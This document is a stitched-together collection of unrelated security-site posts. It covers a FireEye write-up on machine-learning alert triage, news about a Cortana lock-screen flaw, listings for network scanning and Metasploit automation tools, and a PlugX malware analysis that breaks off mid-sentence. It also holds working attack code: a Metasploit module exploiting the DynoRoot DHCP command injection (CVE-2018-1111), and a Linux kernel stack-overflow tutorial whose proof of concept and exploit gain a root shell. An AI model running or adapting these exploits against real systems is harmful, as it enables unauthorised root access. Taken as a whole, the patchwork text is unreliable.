“feature” could be the length of the string. The central idea behind building features for our alert classification model was to find a way to represent and record all the aspects that an analyst might consider when making a decision. Building the model then requires choosing a model structure to use, and training the model on a subset of the total data available. The larger and more diverse the training data set, generally the better the model will perform. The remaining data is used as a “test set” to see if the trained model is indeed effective. Holding out this test set ensures the model is evaluated on samples it has never seen before, but for which the true labels are known. Finally, it is critical to ensure there is a way to evaluate the efficacy of the model over time, as well as to investigate mistakes so that appropriate adjustments can be made. Without a plan and a pipeline to evaluate and retrain, the model will almost certainly decay in performance. Feature Engineering Before creating any of our own models, we interviewed experienced analysts and documented the information they typically evaluate before making a decision on an alert. Those interviews formed the basis of our feature extraction. For example, when an analyst says that reviewing an alert is “easy”, we ask: “Why? And what helps you make that decision?” It is this reverse engineering of sorts that gives insight into features and models we can use to capture analysis. For example, consider a process execution event. An alert on a potentially malicious process execution may contain the following fields: Process Path Process MD5 Parent Process Process Command Arguments While this may initially seem like a limited feature space, there is a lot of useful information that one can extract from these fields. Beginning with the process path of, say, “C:\windows\temp\m.exe”, an analyst can immediately see some features: The process resides in a temporary folder: C:\windows\temp\ The process is two directories deep in the file system The process executable name is one character long The process has an .exe extension The process is not a “common” process name While these may seem simple, over a vast amount of data and examples, extracting these bits of information will help the model to differentiate between events. Even the most basic aspects of an artifact must be captured in order to “teach” the model to view processes the way an analyst does. The features are then encoded into a more discrete representation, similar to this: Temp_folder Depth Name_Length Extension common_process_name TRUE 2 1 exe FALSE Another important feature to consider about a process execution event is the combination of parent process and child process. Deviation from expected “lineage” can be a strong indicator of malicious activity. Say the parent process of the aforementioned example was ‘powershell.exe’. Potential new features could then be derived from the concatenation of the parent process and the process itself: ‘powershell.exe_m.exe’. This functionally serves as an identity for the parent-child relation and captures another key analysis artifact. The richest field, however, is probably the process arguments. Process arguments are their own sort of language, and language analysis is a well-tread space in predictive analytics. We can look for things including, but not limited to: Network connection strings (such as ‘http://’, ‘https://’, ‘ftp://’). Base64 encoded commands Reference to Registry Keys (‘HKLM’, ‘HKCU’) Evidence of obfuscation (ticks, $, semicolons) (read Daniel Bohannon’s work for more) The way these features and their values appear in a training dataset will define the way the model learns. Based on the distribution of features across thousands of alerts, relationships will start to emerge between features and labels. These relationships will then be recorded in our model, and ultimately used to influence the predictions for new alerts. Looking at distributions of features in the training set can give insight into some of these potential relationships. For example, Figure 2 shows how the distribution of Process Command Length may appear when grouping by malicious (red) and benign (blue). Figure 2: Distribution of Process Event alerts grouped by Process Command Length This graph shows that over a subset of samples, the longer the command length, the more likely it is to be malicious. This manifests as red on the right and blue on the left. However, process length is not the only factor. As part of our feature set, we also thought it would be useful to approximate the “complexity” of each command. For this, we used “Shannon entropy”, a commonly used metric that measures the degree of randomness present in a string of characters. Figure 3 shows a distribution of command entropy, broken out into malicious and benign. While the classes do not separate entirely, we can see that for this sample of data, samples with higher entropy generally have a higher chance of being malicious. Figure 3: Distribution of Process Event alerts grouped by entropy Model Selection and Generalization Once features have been generated for the whole dataset, it is time to use them to train a model. There is no perfect procedure for picking the best model, but looking at the type of features in our data can help narrow it down. In the case of a process event, we have a combination of features represented as strings and numbers. When an analyst evaluates each artifact, they ask questions about each of these features, and combine the answers to estimate the probability that the process is malicious. For our use case, it also made sense to prioritize an ‘interpretable’ model – that is, one that can more easily expose why it made a certain decision about an artifact. This way analysts can build confidence in the model, as well as detect and fix analytical mistakes that the model is making. Given the nature of the data, the decisions analysts make, and the desire for interpretability, we felt that a decision tree-based model would be well-suited for alert classification. There are many publicly available resources to learn about decision trees, but the basic intuition behind a decision tree is that it is an iterative process, asking a series of questions to try to arrive at a highly confident answer. Anyone who has played the game “Twenty Questions” is familiar with this concept. Initially, general questions are asked to help eliminate possibilities, and then more specific questions are asked to narrow down the possibilities. After enough questions are asked and answered, the ‘questioner’ feels they have a high probability of guessing the right answer. Figure 4 shows an example of a decision tree that one might use to evaluate process executions. Figure 4: Decision tree for deciding whether an alert is benign or malicious For the example alert in the diagram, the “decision path” is marked in red. This is how this decision tree model makes a prediction. It first asks: “Is the length greater than 100 characters?” If so, it moves to the next question “Does it contain the string ‘http’?” and so on until it feels confident in making an educated guess. In the example in Figure 4, given that 95 percent of all the training alerts traveling this decision path were malicious, the model predicts a 95 percent chance that this alert will also be malicious. Because they can ask such detailed combinations of questions, it is possible that decision trees can “overfit”, or learn rules that are too closely tied to the training set. This reduces the model’s ability to “generalize” to new data. One way to mitigate this effect is to use many slightly different decision trees and have them each “vote” on the outcome. This “ensemble” of decision trees is called a Random Forest, and it can improve performance for the model when deployed in the wild. This is the algorithm we ultimately chose for our model. How the SOC Alert Model Works When a new alert appears, the data in the artifact is transformed into a vector of the encoded features, with the same structure as the feature representations used to train the model. The model then evaluates this “feature vector” and applies a confidence level for the predicted label. Based on thresholds we set, we can then classify the alert as malicious or benign. Figure 5: An alert presented to the analyst with its raw values captured As an example, the event shown in Figure 5 might create the following feature values: Parent Process: ‘wscript’ Command Entropy: 5.08 Command Length =103 Based on how they were trained, the trees in the model each ask a series of questions of the new feature vector. As the feature vector traverses each tree, it eventually converges on a terminal “leaf” classifying it as either benign or malicious. We can then evaluate the aggregated decisions made by each tree to estimate which features in the vector played the largest role in the ultimate classification. For the analysts in the SOC, we then present the features extracted from the model, showing the distribution of those features over the entire dataset. This gives the analysts insight into “why” the model thought what it thought, and how those features are represented across all alerts we have seen. For example, the “explanation” for this alert might look like: Command Entropy = 5.08 > 4.60: 51.73% Threat occuranceOfChar “\”= 9.00 > 4.50: 64.09% Threat occuranceOfChar:“)” (=0.00) <= 0.50: 78.69% Threat NOT processTree=”cmd.exe_to_cscript.exe”: 99.6% Threat Thus, at the time of analysis, the analysts can see the raw data of the event, the prediction from the model, an approximation of the decision path, and a simplified, interpretable view of the overall feature importance. How the SOC Uses the Model Showing the features the model used to reach the conclusion allows experienced analysts to compare their approach with the model, and give feedback if the model is doing something wrong. Conversely, a new analyst may learn to look at features they may have otherwise missed: the parent-child relationship, signs of obfuscation, or network connection strings in the arguments. After all, the model has learned on the collective experience of every analyst over thousands of alerts. Therefore, the model provides an actionable reflection of the aggregate analyst experience back to the SOC, so that each analyst can transitively learn from their colleagues. Additionally, it is possible to write rules using the output of the model as a parameter. If the model is particularly confident on a subset of alerts, and the SOC feels comfortable automatically classifying that family of threats, it is possible to simply write a rule to say: “If the alert is of this type, AND for this malware family, AND the model confidence is above 99, automatically call this alert bad and generate a report.” Or, if there is a storm of probable false positives, one could write a rule to cull the herd of false positives using a model score below 10. How the Model Stays Effective The day the model is trained, it stops learning. However, threats – and therefore alerts – are constantly evolving. Thus, it is imperative to continually retrain the model with new alert data to ensure it continues to learn from changes in the environment. Additionally, it is critical to monitor the overall efficacy of the model over time. Building an efficacy analysis pipeline to compare model results against analyst feedback will help identify if the model is beginning to drift or develop structural biases. Evaluating and incorporating analyst feedback is also critical to identify and address specific misclassifications, and discover potential new features that may be necessary. To accomplish these goals, we run a background job that updates our training database with newly labeled events. As we get more and more alerts, we periodically retrain our model with the new observations. If we encounter issues with accuracy, we diagnose and work to address them. Once we are satisfied with the overall accuracy score of our retrained model, we store the model object and begin using that model version. We also provide a feedback mechanism for analysts to record when the model is wrong. An analyst can look at the label provided by the model and the explanation, but can also make their own decision. Whether they agree with the model or not, they can input their own label through the interface. We store this label provided by the analyst along with any optional explanation given by them regarding the explanation. Finally, it should be noted that these manual labels may require further evaluation. As an example, consider a commodity malware alert, in which network command and control communications were sinkholed. An analyst may evaluate the alert, pull back triage details, including PCAP samples, and see that while the malware executed, the true threat to the environment was mitigated. Since it does not represent an exigent threat, the analyst may mark this alert as ‘benign’. However, the fact that it was sinkholed does not change that the artifacts of execution still represent malicious activity. Under different circumstances, this infection could have had a negative impact on the organization. However, if the benign label is used when retraining the model, that will teach the model that something inherently malicious is in fact benign, and potentially lead to false negatives in the future. Monitoring efficacy over time, updating and retraining the model with new alerts, and evaluating manual analyst feedback gives us visibility into how the model is performing and learning over time. Ultimately this helps to build confidence in the model, so we can automate more tasks and free up analyst time to perform tasks such as hunting and investigation. Conclusion A supervised learning model is not a replacement for an experienced analyst. However, incorporating predictive analytics and machine learning into the SOC workflow can help augment the productivity of analysts, free up time, and ensure they utilize investigative skills and creativity on the threats that truly require expertise. This blog post outlines the major components and considerations of building an alert classification model for the SOC. Data collection, labeling, feature generation, model training, and efficacy analysis must all be carefully considered when building such a model. FireEye continues to iterate on this research to improve our detection and response capabilities, continually improve the detection efficacy of our products, and ultimately protect our clients. The process and examples shown discussed in this post are not mere research. Within our FireEye Managed Defense SOC, we use alert classification models built using the aforementioned processes to increase our efficiency and ensure we apply our analysts’ expertise where it is needed most. In a world of ever increasing threats and alerts, increasing SOC efficiency may mean the difference between missing and catching a critical intrusion. Source

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DHCPServer def initialize(info = {}) super(update_info(info, 'Name' => 'DHCP Client Command Injection (DynoRoot)', 'Description' => %q{ This module exploits the DynoRoot vulnerability, a flaw in how the NetworkManager integration script included in the DHCP client in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier processes DHCP options. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol. }, 'Author' => [ 'Felix Wilhelm', # Vulnerability discovery 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => true, 'References' => [ ['AKA', 'DynoRoot'], ['CVE', '2018-1111'], ['EDB': '44652'], ['URL', 'https://github.com/kkirsche/CVE-2018-1111'], ['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'], ['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'], ['URL', 'https://dynoroot.ninja/'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'], ['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'], ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111'] ], 'Targets' => [ [ 'Automatic Target', { }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 15 2018' )) deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME') end def exploit hash = datastore.copy start_service(hash) @dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #") begin while @dhcp.thread.alive? sleep 2 end ensure stop_service end end end # 0day.today [2018-06-13] # Source: 0day.today

Cortana, an artificial intelligence-based smart assistant that Microsoft has built into every version of Windows 10, could help attackers unlock your system password. With its latest patch Tuesday release, Microsoft has pushed an important update to address an easily exploitable vulnerability in Cortana that could allow hackers to break into a locked Windows 10 system and execute malicious commands with the user's privileges. In worst case scenario, hackers could also compromise the system completely if the user has elevated privileges on the targeted system. The elevation of privilege vulnerability, tracked as CVE-2018-8140 and reported by McAfee security researchers, resides due to Cortana's failure to adequately check command inputs, which eventually leads to code execution with elevated permissions. Microsoft has classified the flaw as "important" because exploitation of this vulnerability requires an attacker to have physical or console access to the targeted system and the targeted system also needs to have Cortana enabled. Cedric Cochin of McAfee's Advanced Threat Research (ATR) team has published technical details of the flaw, and also provided a step-by-step proof-of-concept video tutorial, showing how he hijacked a locked Windows 10 computer by carrying out a full password reset using Cortana. Cochin represents three different attack vectors, demonstrating how the Cortana flaw could be used for various nefarious purposes, such as retrieving confidential information, logging into a locked device and even run malicious code from the locked screen. McAfee recommends users to turn off Cortana on the lock screen in order to prevent such attacks. Although Microsoft has patched the vulnerability with its latest security updates released yesterday, many PCs will not be running the latest updates just yet. Via thehackernews.com

IP Monster IP Monster Valid IP Generator For Windows Machine's Only Using Nmap generate +5k IP With Secific Port or Services in 3 mins only Script is Random Generator , No IP Range Required Required : Any Windows OS And Nmap Installed Twitter , Linkedin : @WazeHell Download: ip-monster-master.zip or git clone https://github.com/WazeHell/ip-monster.git Mirror: ip-monster.py Source

Metateta Metateta Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit For faster pen testing for large networks What You Can Do Scanning with all metasploit modules for specific network Protocol like smb,smtp,snmp Run all Auxiliary modules against specific network Protocol Run all Possible Metasploit Exploits for specific network Protocol That's is not recommended for real pen testing Can Run against one target or network or even text file with targets Using example's run.py -R 192.168.1.15-255 -p smb -x exploit run.py -r 192.168.1.15 -p smtp -x scan run.py -f hosts.txt -p smb -x auxiliary Author: Hossam Mohamed – @wazehell Download: metateta-master.zip git clone https://github.com/WazeHell/metateta.git Mirror: Source

Principle of kernel stack overflow and the user mode stack overflow are the same, we can use it to hijack control flow and privilge Escalation in Ring 0. Bug Kernel stack overflow like in the user mode. We focus on the function bug2_write,memcpy unsafe function result in potential thread of buffer overflow. //stack_smashing.c #include <linux/init.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/proc_fs.h> int bug2_write(struct file *file,const char *buf,unsigned long len){ char localbuf[8]; memcpy(localbuf,buf,len); return len; } static int __init stack_smashing_init(void){ printk(KERN_ALERT"stack smashing driver init!\n"); create_proc_entry("bug2",0666,0)->write_proc = bug2_write; return 0; } static int __exit stack_smashing_exit(void){ printk(KERN_ALERT"stack smashing driver exit!\n"); } module_init(stack_smashing_init); module_exit(stack_smashing_exit); /* makefile obj-m := stack_smashing.o KERNELDR := /mnt/hgfs/Qemu/x86/linux-2.6.32 PWD := $(shell pwd) modules: $(MAKE) -C $(KERNELDR) M=$(PWD) modules modules_install: $(MAKE) -C $(KERNELDR) M=$(PWD) modules_install clean: $(MAKE) -C $(KERNELDR) M=$(PWD) clean */ We drag stack_smashing.ko in IDA for analyzing the stack-frame of bug2_write. bug2_write function stack frame as shown in the following figure: Array localbuf[] can be overwritten and we can control the return address to hijack control flow. Attention please ,at that time ,we are in Ring0 (kernel mode). That's a simplest example of kernel stack smashing. PoC #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> int main(){ char buf[24]={0}; memset(buf,0,sizeof(buf)); *((void**)(buf+20)) = 0x42424242; int fd=open("/proc/bug2",O_WRONLY); write(fd,buf,sizeof(buf)); return 0; } We run the poc in qemu,it's get the info below: /usr/example/stack_smashing # ./poc [ 26.112180] Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: c882f04f [ 26.112180] [ 26.128511] Pid: 63, comm: poc Tainted: P 2.6.32 #2 [ 26.136817] Call Trace: [ 26.140917] [<c14571d5>] ? printk+0x1d/0x1f [ 26.147655] [<c1457117>] panic+0x47/0xe8 [ 26.154735] [<c10413ae>] __stack_chk_fail+0x1e/0x20 [ 26.159501] [<c882f04f>] ? bug2_write+0x4f/0x50 [stack_smashing] [ 26.170878] [<c882f04f>] bug2_write+0x4f/0x50 [stack_smashing] [ 26.179890] [<c11482d9>] proc_file_write+0x59/0x80 [ 26.190290] [<c1148280>] ? proc_file_write+0x0/0x80 [ 26.197294] [<c1143cd8>] ? proc_reg_write+0x58/0x90 [ 26.203064] [<c10fabff>] ? vfs_write+0x8f/0x190 [ 26.210005] [<c1143c80>] ? proc_reg_write+0x0/0x90 [ 26.216393] [<c10faf2d>] ? sys_write+0x3d/0x70 [ 26.225201] [<c1002d0b>] ? sysenter_do_call+0x12/0x22 Our kernel protect the stack with a “canary” value，it's the same as the "stack canary" in user mode，so when we execute our poc directly，canary be covered with 0x0000000 ,it cause kernel panic. Qemu crashed! So we need to compile a new kernel without the option of "Canary" by the operations. Vim at .config in the root of linux kernel, comment the line CONFIG_CC_STACKPROTECTOR=y,and type n(no) when make point out open the stack canary protection or not. Go on ，we re complile our module and poc in the new kernel and run poc again. /usr/example/stack_smashing # ./poc [ 28.484238] BUG: unable to handle kernel paging request at 42424242 [ 28.484238] IP: [<42424242>] 0x42424242 [ 28.484238] *pdpt = 0000000007884001 *pde = 0000000000000000 [ 28.484238] Oops: 0000 [#1] SMP [ 28.484238] last sysfs file: [ 28.484238] Modules linked in: stack_smashing(P) [ 28.484238] [ 28.484238] Pid: 64, comm: poc Tainted: P (2.6.32 #1) Bochs [ 28.484238] EIP: 0060:[<42424242>] EFLAGS: 00010246 CPU: 0 [ 28.484238] EIP is at 0x42424242 [ 28.484238] EAX: 00000018 EBX: c784f420 ECX: 00000000 EDX: bf876794 [ 28.484238] ESI: 00000000 EDI: 00000000 EBP: 00000000 ESP: c7897f2c [ 28.484238] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 28.484238] Process poc (pid: 64, ti=c7896000 task=c78a9960 task.ti=c7896000) [ 28.484238] Stack: [ 28.484238] 00000000 00000018 bf876794 c784f420 c7882780 c1146f90 c7897f64 c1142b88 [ 28.484238] <0> c7897f98 00000018 bf876794 c7882780 00000018 bf876794 c7897f8c c10f9d8f [ 28.484238] <0> c7897f98 00000002 00000000 c1142b30 c7882780 c7882780 00000000 080496b0 [ 28.484238] Call Trace: [ 28.484238] [<c1146f90>] ? proc_file_write+0x0/0x80 [ 28.484238] [<c1142b88>] ? proc_reg_write+0x58/0x90 [ 28.484238] [<c10f9d8f>] ? vfs_write+0x8f/0x190 [ 28.484238] [<c1142b30>] ? proc_reg_write+0x0/0x90 [ 28.484238] [<c10fa0bd>] ? sys_write+0x3d/0x70 [ 28.484238] [<c1002ce4>] ? sysenter_do_call+0x12/0x22 [ 28.484238] Code: Bad EIP value. [ 28.484238] EIP: [<42424242>] 0x42424242 SS:ESP 0068:c7897f2c [ 28.484238] CR2: 0000000042424242 [ 28.619608] ---[ end trace 978b1135ce269998 ]--- Killed [ 28.484238] EIP: [<42424242>] 0x42424242 SS:ESP 0068:c7897f2c Kernel jumped to 0x42424242 which is the address we want to control, it proves that we can hijack control flow in kernel mode. Exploit Our aim is to get a root shell. For achieving our aim we should have two steps: commit_creds(prepare_kernel_cred(0)) for elevating privilege in kernel mode. system("/bin/sh") for getting shell in user mode So we can control return address to executecommit_creds(prepare_kernel_cred(0)) in bug2_write function kernel mode. But stack is trashed, so we can’t return normally. We could fix up the stack, but that’s boring. Instead, let’s jump directly to user mode. System call mechanism Normal function calls: Use instructions call and ret Hardware saves return address on the stack User → kernel calls: (ignoring some alternatives) Use instructions int and iret Hardware saves a “trap frame” on the stack Our program should iret from kernel mode . Ring0 -> Ring3 ,we first in kernel mode , use kernel stack ,when switch to running as a less-privileged user mode ,stack will switch to user stack. So we need to save our state information in the struct trap frame first when we go to kernel mode. trap frame Trap frame save on stack, we return to user mode, our user stat get from it. struct trap_frame { void* eip; // instruction pointer +0 uint32_t cs; // code segment +4 uint32_t eflags; // CPU flags +8 void* esp; // stack pointer +12 uint32_t ss; // stack segment +16 } __attribute__((packed)); We build a fake trap frame in our exploit, save all the stat information in it and change eip to execve("/bin/sh") address, when we return from kernel mode ,we will spawn a Root shell. Our exploit as below: #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> #include <string.h> #include <stdint.h> struct trap_frame{ void *eip; uint32_t cs; uint32_t eflags; void *esp; uint32_t ss; }; struct trap_frame tf; void launch_shell(){ execl("/bin/sh","sh",NULL); } void prepare_tf(){ asm("pushl %cs;" "popl tf+4;" //set cs "pushfl;" "popl tf+8;" //set eflags; "pushl %esp;" "popl tf+12;" //set esp; "pushl %ss;" "popl tf+16;"); //set ss; tf.eip = &launch_shell; tf.esp -= 1024; } #define KERNCALL __attribute__((regparm(3))) void (*commit_creds)(void *) KERNCALL = (void*)0xc10682e0; void *(*prepare_kernel_cred)(void *) KERNCALL = (void *)0xc1068480; void payload(void){ commit_creds(prepare_kernel_cred(0)); asm("mov $tf,%esp;" "iret;" ); } int main(){ char buf[24]={0}; memset(buf,'A',20); *(void **)(buf+20) = &payload; prepare_tf(); int fd=open("/proc/bug2",O_WRONLY); write(fd,buf,sizeof(buf)); } In our exploit, Elevate privilege: as in user mode ,control return address to execute commit_creds(prepare_kernel_cred(0)) to have a ROOT, and then prepare for iret to set fake trap frame on right position. Get shell: we build a fake trap frame in use mode stack tf， and function prepare_tf() save the stat : CS,EFLAGS,ESP,SS to trap frame and change EIP=&launch_shell debug Ensure module .text address frist. cat /sys/module/stack_smashing/sections/.text 0xc882f000 Run qemu , add symbols file to gdb (only .text is enough) and then we can set breakpoint in stack_smashing.ko. gdb-peda$ add-symbol-file ../busybox-1.19.4/_install/usr/example/stack_smashing/stack_smashing.ko 0xc882f000 add symbol table from file "../busybox-1.19.4/_install/usr/example/stack_smashing/stack_smashing.ko" at .text_addr = 0xc882f000 gdb-peda$ b *bug2_write Breakpoint 1 at 0xc882f000: file /mnt/hgfs/Qemu/x86/busybox-1.19.4/_install/usr/example/stack_smashing/stack_smashing.c, line 6. gdb-peda$ target remote 127.0.0.1:1234 Warning: Got Ctrl+C / SIGINT! Python Exception <type 'exceptions.KeyboardInterrupt'> : Error while running hook_stop: Could not convert arguments to Python string. default_idle () at arch/x86/kernel/process.c:311 311 current_thread_info()->status |= TS_POLLING; gdb-peda$ c Warning: not running or target is remote Breakpoint 1, bug2_write (file=0xc693ba00, buf=0xbf9fcf84 'A' <repeats 20 times>, ">\217\004\b", len=0x18) at /mnt/hgfs/Qemu/x86/busybox-1.19.4/_install/usr/example/stack_smashing/stack_smashing.c:6 6 int bug2_write(struct file *file,const char *buf,unsigned long len){ gdb-peda$ x/20i $pc => 0xc882f000 <bug2_write>: push ebp 0xc882f001 <bug2_write+1>: mov ebp,esp 0xc882f003 <bug2_write+3>: sub esp,0x10 0xc882f006 <bug2_write+6>: mov DWORD PTR [ebp-0x8],esi 0xc882f009 <bug2_write+9>: mov DWORD PTR [ebp-0x4],edi 0xc882f00c <bug2_write+12>: nop DWORD PTR [eax+eax*1+0x0] 0xc882f011 <bug2_write+17>: mov eax,ecx 0xc882f013 <bug2_write+19>: mov esi,edx 0xc882f015 <bug2_write+21>: shr ecx,0x2 0xc882f018 <bug2_write+24>: lea edi,[ebp-0x10] 0xc882f01b <bug2_write+27>: rep movs DWORD PTR es:[edi],DWORD PTR ds:[esi] 0xc882f01d <bug2_write+29>: mov ecx,eax 0xc882f01f <bug2_write+31>: and ecx,0x3 0xc882f022 <bug2_write+34>: je 0xc882f026 <bug2_write+38> 0xc882f024 <bug2_write+36>: rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi] 0xc882f026 <bug2_write+38>: mov esi,DWORD PTR [ebp-0x8] 0xc882f029 <bug2_write+41>: mov edi,DWORD PTR [ebp-0x4] 0xc882f02c <bug2_write+44>: mov esp,ebp 0xc882f02e <bug2_write+46>: pop ebp 0xc882f02f <bug2_write+47>: ret As below, buffer overflow to cover return address to payload() fcuntion. gdb-peda$ b *bug2_write+47 Breakpoint 2 at 0xc882f02f: file /mnt/hgfs/Qemu/x86/busybox-1.19.4/_install/usr/example/stack_smashing/stack_smashing.c, line 10. gdb-peda$ c Warning: not running or target is remote Breakpoint 2, 0xc882f02f in bug2_write (file=<optimized out>, buf=0xbf9fcf84 'A' <repeats 20 times>, ">\217\004\b", len=<optimized out>) at /mnt/hgfs/Qemu/x86/busybox-1.19.4/_install/usr/example/stack_smashing/stack_smashing.c:10 10 } gdb-peda$ x/10a $esp 0xc6949f28: 0x8048f3e 0x0 0x18 0xbf9fcf84 0xc6949f38: 0xc690e420 0xc693ba00 0xc1146f90 <proc_file_write> 0xc6949f64 0xc6949f48: 0xc1142b88 <proc_reg_write+88> 0xc6949f98 gdb-peda$ x/12i 0x8048f3e 0x8048f3e: push ebp 0x8048f3f: mov ebp,esp 0x8048f41: push ebx 0x8048f42: sub esp,0x4 0x8048f45: mov ebx,DWORD PTR ds:0x80ef068 0x8048f4b: mov edx,DWORD PTR ds:0x80ef06c 0x8048f51: mov eax,0x0 0x8048f56: call edx 0x8048f58: call ebx 0x8048f5a: mov esp,0x80f112c 0x8048f5f: iret Saved fake trap frame (The state of user proc exp) as below. EIP=0x80f112c CS=0xbf9f0073 EFLAGS=0x282 ESP=0xbf9fcb68 SS =0xbf9f007b gdb-peda$ x/10a 0x80f112c 0x80f112c: 0x8048ee0 0xbf9f0073 0x282 <__this_module+66> 0xbf9fcb68 0x80f113c: 0xbf9f007b 0x28 <stack_smashing_init+4> 0x40 <stack_smashing_init+28> 0x1 0x80f114c: 0x80f0100 0x0 When executed iret，eip=0x8048ee0 the address of lanuch_shell, corresponding register have been set. gdb-peda$ x/9i 0x8048ee0 0x8048ee0: push ebp 0x8048ee1: mov ebp,esp 0x8048ee3: sub esp,0x18 0x8048ee6: mov DWORD PTR [esp+0x8],0x0 0x8048eee: mov DWORD PTR [esp+0x4],0x0 0x8048ef6: mov DWORD PTR [esp],0x80c5488 0x8048efd: call 0x8053d00 0x8048f02: leave 0x8048f03: ret gdb-peda$ info registers eax 0x0 0x0 ecx 0xffffffff 0xffffffff edx 0x0 0x0 ebx 0xc10682e0 0xc10682e0 esp 0xbf9fcb68 0xbf9fcb68 ebp 0xc6949f28 0xc6949f28 esi 0x41414141 0x41414141 edi 0x41414141 0x41414141 eip 0x8048ee0 0x8048ee0 eflags 0x282 [ SF IF ] cs 0x73 0x73 ss 0x7b 0x7b ds 0x7b 0x7b es 0x7b 0x7b fs 0x0 0x0 gs 0x33 0x33 At the end, execute to get a Root shell. /usr/example/stack_smashing # insmod stack_smashing.ko [ 57.857589] stack_smashing: module license 'unspecified' taints kernel. [ 57.868753] Disabling lock debugging due to kernel taint [ 57.873241] stack smashing driver init! /usr/example/stack_smashing # su xingxing sh: can't access tty; job control turned off ~ $ id uid=1000(xingxing) gid=1000 groups=1000 /usr/example/stack_smashing $ ./exp sh: can't access tty; job control turned off /usr/example/stack_smashing # whoami whoami: unknown uid 0 /usr/example/stack_smashing # id uid=0 gid=0 Yes, we get ROOT. Mitigate Modern Linux kernels protect the stack with a “canary” value On function return, if canary was overwritten, kernel panics Just like in user mode. Prevents simple attacks, but there’s still a lot you can do. References Linux内核漏洞利用（二）NULL Pointer Dereference Linux 内核漏洞利用教程（二）：两个Demo mmap_min_addr write-kernel-exploits Source: http://tacxingxing.com

[The PlugX malware family has always intrigued me. I was curious to look at one variant. Going over the Internet and the research articles and blogs about it I came across the research made by Fabien Perigaud. From here I got an old PlugX builder. Then I set a lab that allowed me to get insight about how an attacker would operate a PlugX campaign. In this post, l will cover a brief overview about the PlugX builder, analyze and debug the malware installation and do a quick look at the C2 traffic. ~LR] PlugX is commonly used by different threat groups on targeted attacks. PlugX is also refered as KORPLUG, SOGU, DestroyRAT and is a modular backdoor that is designed to rely on the execution of signed and legitimated executables to load malicious code. PlugX, normally has three main components, a DLL, an encrypted binary file and a legitimate and signed executable that is used to load the malware using a technique known as DLL search order hijacking. But let’s start with a quick overview about the builder. The patched builder, MD5 6aad032a084de893b0e8184c17f0376a, is an English version, from Q3 2013, of the featured-rich and modular command & control interface for PlugX that allows an operator to: Build payloads, set campaigns and define the preferred method for the compromised hosts to check-in and communicate with the controller. Proxy connections and build a tiered C2 communication model. Define persistence mechanisms and its attributes. Set the process(s) to be injected with the payload. Define a schedule for the C2 call backs. Enable keylogging and screen capture. Manage compromises systems per campaign. Then for each compromised system, the operator has extensive capabilities to interact with the systems over the controller that includes the following modules: Disk module allows the operator to write, read, upload, download and execute files. Networking browser module allows the operator to browse network connections and connect to another system via SMB. Process module to enumerate, kill and list loaded modules per process. Services module allows the operator to enumerate, start, stop and changing booting properties Registry module allows the operator to browse the registry and create, delete or modify keys. Netstat module allows the operator to enumerate TCP and UDP network connections and the associated processes Capture module allows the operator to perform screen captures Control plugin allows the operator to view or remote control the compromised system in a similar way like VNC. Shell module allows the operator to get a command line shell on the compromised system. PortMap module allows the operator to establish port forwarding rules. SQL module allows the operator to connect to SQL servers and execute SQL statements. Option module allows the operator to shut down, reboot, lock, log-off or send message boxes. Keylogger module captures keystrokes per process including window titles. The picture below shows the Plug-X C2 interface. So, with this we used the builder functionality to define the different settings specifying C2 comms password, campaign, mutex, IP addresses, installation properties, injected binaries, schedule for call-back, etc. Then we build our payload. The PlugX binary produced by this version of the builder (LZ 2013-8-18) is a self-extracting RAR archive that contains three files. This is sometimes referred in the literature as the PlugX trinity payload. Executing the self-extracting RAR archive will drop the three files to the directory chosen during the process. In this case “%AUTO%/RasTls”. The files are: A legitimate signed executable from Kaspersky AV solution named “avp.exe”, MD5 e26d04cecd6c7c71cfbb3f335875bc31, which is susceptible to DLL search order hijacking . The file “avp.exe” when executed will load the second file: “ushata.dll”, MD5 728fe666b673c781f5a018490a7a412a, which in this case is a DLL crafted by the PlugX builder which on is turn will load the third file. The third file: “ushata.DLL.818”, MD5 “21078990300b4cdb6149dbd95dff146f” contains obfuscated and packed shellcode. So, let’s look at the mechanics of what happens when the self-extracting archive is executed. The three files are extracted to a temporary directory and “avp.exe” is executed. The “avp.exe” when executed will load “ushata.dll” from the running directory due to the DLL search order hijacking using Kernel32.LoadLibrary API. Then “ushata.dll” DLL entry point is executed. The DLL entry point contains code that verifies if the system date is equal or higher than 20130808. If yes it will get a handle to “ushata.DLL.818”, reads its contents into memory and changes the memory address segment permissions to RWX using Kernel32.VirtualProtect API. Finally, returns to the first instruction of the loaded file (shellcode). The file “ushata.DLL.818” contains obfuscated shellcode. The picture below shows the beginning of the obfuscated shellcode. The shellcode unpacks itself using a custom algorithm. This shellcode contains position independent code. Figure below shows the unpacked shellcode. The shellcode starts by locating the kernel32.dll address by accessing the Thread Information Block (TIB) that contains a pointer to the Process Environment Block (PEB) structure. Figure below shows a snippet of the shellcode that contains the different sequence of assembly instructions for the code to find the Kernel32.dll. It then reads kernel32.dll export table to locate the desired Windows API’s by comparing them with stacked strings. Then, the shellcode decompresses a DLL (offset 0x784) MD5 